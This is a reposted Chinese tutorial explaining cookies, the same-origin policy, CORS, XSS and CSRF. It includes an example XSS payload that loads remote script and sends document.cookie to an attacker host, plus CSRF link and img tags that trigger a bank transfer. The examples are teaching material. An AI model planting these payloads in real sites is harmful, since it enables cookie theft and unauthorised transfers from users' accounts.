2. 程式人生 > >web安全同源策略以及跨站指令碼,跨站請求偽造

web安全同源策略以及跨站指令碼,跨站請求偽造

阿新 發佈:2018-12-02

http是無狀態協議 所以伺服器為了辨識訪問者是否已經訪問過 會給瀏覽器一個cookie

瀏覽器再次訪問時候 將cookie傳過去 伺服器就可以知道 該訪問者已經登陸過 不需要再次登陸

 

 

 

但是早起 伺服器是被動 也就是 當瀏覽器發起請求 才會有迴應,如果說對於一些特殊情況,比如需要實時更新的股票資訊,不免需要

瀏覽器每間隔一段時間重複去詢問 查詢股票是否已經變化

瀏覽器 股票漲了了嗎 伺服器 沒有

瀏覽器 股票漲了了嗎 伺服器 沒有

瀏覽器 股票漲了了嗎 伺服器 沒有

瀏覽器 股票漲了了嗎 伺服器 沒有

瀏覽器 股票漲了了嗎 伺服器 漲了

。。。這個過程叫輪詢 效率是很低的

 

 

 

然後現在 websocket可以建立一個長連線 實現伺服器與瀏覽器的實時通訊 無需輪訓

 

 

 

安全:

伺服器通過cookie來辨識使用者身份,因此cookie裡實際上是儲存有使用者的加密資訊,一但黑客獲取到cookie便可以偽造使用者身份去登陸,

比如獲取到網銀的cookie後 就可以去登陸使用者的網銀 因此是非常危險的

 

 

因此 瀏覽器有同源策略

除非兩個網頁的javascipt來自同一個源頭 ,否則不允許一個網頁的javaScript訪問另外一個網頁的內容 包括cookie DOM 等等

 

同一個源頭指的是 url地址相同 埠號相同

 

 

同時 為了方便 支援 嵌入式的 跨域訪問 比如 <script src="xxxx"> <img src="xxx"> 這種相當於是瀏覽器發起了一次get請求 取到相關資源 放到本地,

這個可以不是必須和網站同源 因此也給了黑客可乘之機

 

 

 

後來 往往一個系統有多個子系統 每個子系統又有多個域名,因此同源策略也支援 如果兩個網頁的一級域名相同 可以共享cookie

但是cookie的domain必需設定是那個一級域名 例如 document.cookie 'test=true;path=/;domain=xxx.com' 這裡的xxx.com是一級域名

 

 

另外 同源策略 還是拒絕用ajax去訪問不同源的地址,也就是XMLHttpRequest 物件 只能訪問同源伺服器

 

 

但是現在 都是前後端分離 ,分散式系統 ,這個同源限制了前後端分離的實現,

比如說 前端頁面A中, 有直接使用ajax去獲取後端專案B的資源 ,因為兩個專案A和B不在同一個源(url或者埠不一致),則無法訪問

 

這裡需要用到代理, 也就是 專案A的前端頁面 ,發起請求給專案A的伺服器 ,然後專案A的伺服器 通過伺服器間通訊方式 再去請求專案B的伺服器 拿資料

然後 再返回給前端

 

 

除此之外 還有一種方式 就是如果伺服器之間是互相可以信任的 ,可以在伺服器domain上設定一個白名單 ,列出它允許哪些domain的ajax請求

 

這個方法叫做 CORS (cross origin resource sharing ) 跨站資源共享

 

體現在springboot上就是 @CrossOrigin

 

 

 

 

黑客慣用手法

跨站指令碼 (Cross SIte scripting ) XSS

 

當網頁上有輸入框的時候 而且沒有對輸入進行校驗和過濾 就極有可能被XSS注入攻擊

 

 

舉個例子:

當你在某個網站的評論框裡輸入

 

 

不錯的文章 <script type="text/javascipt"> alert(document.cookie) </script>

 

 

如果這個網站不對輸入進行校驗和過濾轉義的話 就會將整行原封不動的存進資料庫裡,當其他使用者來訪問的時候 ,點開網頁

載入評論的時候 除了看到了 不錯的文章 這幾個字,script指令碼此時也被執行了,這一行的意思是打印出當前使用者的cookie

 

這裡只是舉個例子,這樣就完成一個跨站指令碼的注入 ,攻擊者完全可以將複雜的邏輯封裝成一個js檔案 比如 xx.js ,然後

<script type="text/javascipt" src="xx.com/xx.js"> </script> 將這個js 指令碼注入進去

 

使用者進去就已經載入了這個js

 

js內部還可以構造 <img src="xxx.com/log?"+document.cookie> 這樣的get請求將訪問使用者的cookie 帶到 xx.com這個攻擊者的站點去

 

 

 

 

 

現在很多網站為了防範這種情況 給cookie加上了 HttpOnly這個屬性 一但加上,瀏覽器將禁止javascipt去讀取cookie

 

 

但是黑客可以通過xss注入 不一定非要拿cookie 它甚至可以用js畫一個假的登入框覆蓋到真的登陸框之上,讓使用者去登陸,從而偷盜使用者賬戶密碼

 

這個就是 跨站請求偽造 ( Cross site request forgery ) CSRF

 

 

比如說 你在登陸了網銀的情況下,此時網銀的cookie是存在的

 

此時 有一條顯示在垃圾廣告中的訊息 恭喜你獲得了一臺iphoneX 點選領取 你一點 發現 自己的網銀裡的錢 沒了

 

這個 訊息的實質是 <a href="網銀頁面的地址/轉賬地址?toBanKId=黑客的賬戶&money=金額"> 恭喜你獲得了一臺iphoneX 點選領取 </a>

 

<a>標籤裡的內容是不會顯示出來的 所以使用者往往不小心就點了,因為訪問的這個一個轉賬的url 因為此時使用者正好在網銀頁面,cookie是存在的,因此網銀的伺服器就會認為該使用者要轉賬。

 

這就是請求偽造

 

 

然而 完全可以使用者不點選就中招 比如 在某個頁面裡放上

 

<img src="網銀頁面的地址/轉賬地址?toBanKId=黑客的賬戶&money=金額">恭喜你獲得了一臺iphoneX 點選領取 </img>

 

 

當用戶開啟頁面的時候 ,圖片就會自動載入,此時就等於是在訪問轉賬頁面了

 

 

 

 

 

相關推薦

web安全同源策略以及指令碼請求偽造

http是無狀態協議 所以伺服器為了辨識訪問者是否已經訪問過 會給瀏覽器一個cookie 瀏覽器再次訪問時候 將cookie傳過去 伺服器就可以知道 該訪問者已經登陸過 不需要再次登陸       但是早起 伺服器是被動 也就是 當瀏覽器發起請求

指令碼基於DOM的XSS攻擊

問題:    應用程式的客戶端程式碼從docum ent.lo cation、docum ent.U RL、docum ent.referrer或 其 他 任 何攻擊者可以修改的瀏覽器物件獲取資料,如

導入模塊方式(盡量少用from xx import *)以及包的定義目錄運行包和模塊(未完)

sys.path mod 默認 尋找 spa rom bsp 自己 pan 1 import module_name 2 import module_name,module_name2 3 from module_name import * 4 form module_n

Vue學習(7)————————元件以及生命週期函式vue-resource請求資料

首先建立一個Home.vue檔案 <template> <div> <p>{{msg}}</p> <button v-on:click="headRun()">跑</button> </di

解決 axios 域時傳送 post 請求變 options 的問題

前端:VUE 後端:django 前後端除錯時post請求,發現請求方式為options,服務端不接受,後查詢發現遇到大名鼎鼎的跨域問題。 跨域:協議、ip、埠只要前後端有一個不一樣就會出現跨域問題。瀏覽器會嘗試向後端傳送option請求->想後端詢問是否支援從前端的這個域名發起跨

web安全(1)-- XSS(指令碼攻擊)

XSS攻擊,通常指黑客通過“html注入” 篡改了網頁,插入了惡意的指令碼,從而在使用者瀏覽網頁的時候,控制使用者瀏覽器的一種攻擊。其原理是攻擊者向有XSS漏洞的網站中輸入(傳入)一段惡意的HTML程式碼,當其它使用者瀏覽該網站時,這段HTML程式碼會自動執行,從而達到攻擊的目的。如,盜取使用者Co

《白帽子講Web安全》3-指令碼攻擊(XSS)

第3章 跨站指令碼攻擊(XSS) 3.1 XSS簡介 Cross Site Script,跨站指令碼攻擊,簡稱XSS。 XSS攻擊,通常是指黑客通過“HTML注入”篡改了網頁,插入了惡意的指令碼,從而在客使用者瀏覽網頁時,控制使用者瀏覽器的一種攻擊。

安全測試】Web應用安全之XSS指令碼攻擊漏洞相關

閱讀目錄 歡迎轉載,也請註明出處 :http://www.cnblogs.com/Detector/p/8811216.html 謝謝!前言 以前都只是在各類文件中見到過XSS,也進行過相關的學習,但是都是一知半解,過了一段時間就忘了。 前幾天我們收到了了一份標題為《XX賬號暱稱引數中存在儲存XSS漏洞

安全測試】Web應用安全之XSS指令碼攻擊漏洞

前言 以前都只是在各類文件中見到過XSS,也進行過相關的學習,但是都是一知半解,過了一段時間就忘了。 前幾天我們收到了了一份標題為《XX賬號暱稱引數中存在儲存XSS漏洞》的報告文件,來源是一個叫漏洞盒子的機構,看它的官方介紹,是一個網際網路安全測試眾測平臺。 第一次在實際工作中遇到相關的問題,所以決定再系統的

web安全同源策略

rip 瀏覽器中 屬性。 名單 java get message 否則 cookie 為什麽使用同源策略?一個重要原因就是對cookie的保護,cookie 中存著sessionID 。如果已經登錄網站,同時又去了任意其他網站,該網站有惡意JS代碼。如果沒有同源策略,那麽這

Web安全腳本攻擊(XSS)

sca 各類 隱藏 word create 十六 請求 後臺 轉換成 XSS 簡介 跨站腳本攻擊,英文全稱是 Cross Site Script,本來縮寫是CSS,但是為了和層疊樣式表(Cascading Style Sheet,CSS)有所區別,所以在安全領域叫做“XSS

XSS指令碼攻擊以及解決辦法

來源:https://www.cnblogs.com/insaneXs/p/7465014.html XSS,全稱為Cross Site Script,跨站指令碼攻擊,是WEB程式中一種常見的漏洞。其主要的攻擊手段是在在利用網站上的可由使用者輸入資訊的地方,惡意注入含有攻擊性的指令碼,達到攻擊網

web應用安全》學習筆記(二) 被動攻擊與同源策略

被動攻擊與同源策略 瀏覽器針對被動攻擊的防禦策略--沙盒(沙盒的核心概念為同源策略) 主動攻擊 指攻擊者直接攻擊web伺服器,如SQL注入 被動攻擊 單純的被動攻擊攻擊者針對網站的使用者設下陷阱,利用掉入陷阱的使用者來攻擊應用程式 惡意利用網站進行的被動攻

Web開發框架安全問題及防範規範|之CSRF請求偽造

Web站點為什麼會遭受攻擊?是為了惡作劇?損害企業名譽?免費瀏覽收費內容?盜竊使用者隱私資訊?獲取使用者賬號謀取私利?總之攻擊方式層出不窮,作為Web開發框架來說,幫助開發者做好解決安全問題也是刻不容緩的,本篇文章來告訴大家怎麼禁止CSRF跨站請求偽造。 WEb開發框架適用範圍 Web網站 攻擊原理

Web安全之CSRF請求偽造攻擊

CSRF全稱Cross-Site Request Forgery,跨站請求偽造攻擊。 其攻擊原理是: 攻擊者在使用者瀏覽網頁時,利用頁面元素(例如img的src),強迫受害者的瀏覽器向Web應用程式傳送一個改變使用者資訊的請求。 由於發生CSRF攻擊後,攻

JAVA WEB中處理防SQL注入|防XSS指令碼攻擊(咋個辦呢 zgbn)

JAVA WEB中處理防SQL注入|防XSS跨站指令碼 在java web專案中,必然會涉及到從客戶端向服務端提交資料,那麼由於服務端對資料的處理等動作,會因為字串拼接和使用的特殊性,存在一些漏洞被人利用。 這篇文章,主要介紹一下在java web專案中,程

Web安全測試之請求偽造(CSRF)

 跨站請求偽造(即CSRF)被Web安全界稱為諸多漏洞中“沉睡的巨人”,其威脅程度由此“美譽”便可見一斑。本文將簡單介紹該漏洞,並詳細說明造成這種漏洞的原因所在,以及針對該漏洞的黑盒測試與灰盒子測試具體方法和示例,最後提提了一些防範該攻擊的建議,希望本文對讀者的安全測試

web安全請求偽造

CSRF(Cross-site request forgery),中文名稱:跨站請求偽造.因為這個不是使用者真正想發出的請求,這就是所謂的請求偽造;因為這些請求也是可以從第三方網站提交的,所以字首跨站二字。 CSRF發生的場景如下圖所示: 使用者登入訪問了一個受信任的

java web 安全防護1-CSRF(Cross-site request forgery 請求偽造)

參考https://www.aliyun.com/zixun/wenji/1280636.html 參考https://www.cnblogs.com/suizhikuo/p/4545981.html 這兩篇文章 很全。介紹了CSRF的概念。這裡即不贅述了。 這裡截取了主要的概要說明,很

XSS漏洞 加強Web安全

第1章 課程介紹簡單介紹課程的內容。1-1 課程介紹 試看 第2章 基礎知識在基礎知識章節中主要讓同學們對XSS有一個總體的概念,對XSS的原理及危害,以及XSS的型別有一個概念,這個章節中包含了 XSS介紹及原理、反射型XSS、儲存型XSS、DOM型XSS等內容。2-1 XSS介紹及原理 試看2-2 反射